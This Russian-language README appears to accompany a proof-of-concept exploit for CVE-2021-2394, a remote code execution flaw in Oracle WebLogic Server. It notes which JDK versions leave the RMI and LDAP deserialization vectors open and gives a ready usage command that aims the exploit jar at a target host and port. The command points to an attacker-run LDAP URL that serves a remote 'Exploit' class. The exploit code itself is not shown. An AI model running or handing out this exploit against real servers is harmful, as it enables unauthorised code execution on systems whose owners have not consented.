
Эксплойт-доказательство концепции для CVE-2021-2394, уязвимости удаленного выполнения кода в Oracle WebLogic Server. Использует десериализацию LDAP или RMI для доставки нагрузки.
POC для CVE-2021-2394
Примечания
Метод эксплуатации на основе RMI ограничен версиями JDK до 6u132, 7u131, 8u121; начиная с 8u122 добавлен механизм белого списка десериализации, который отключает удалённую загрузку кода через RMI. Метод эксплуатации на основе LDAP ограничен версиями JDK до 6u211, 7u201, 8u191, 11.0.1; в версии 8u191 Oracle ввёл ограничения для вектора LDAP, выпустил CVE-2018-3149 и отключил удалённую загрузку классов через JNDI. Источник: https://www.freebuf.com/vuls/279465.html
Использование:
java -jar CVE_2021_2394.jar rhost rport ldapurljava -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/ExploitСсылки:
Обновления
Аналитическая статья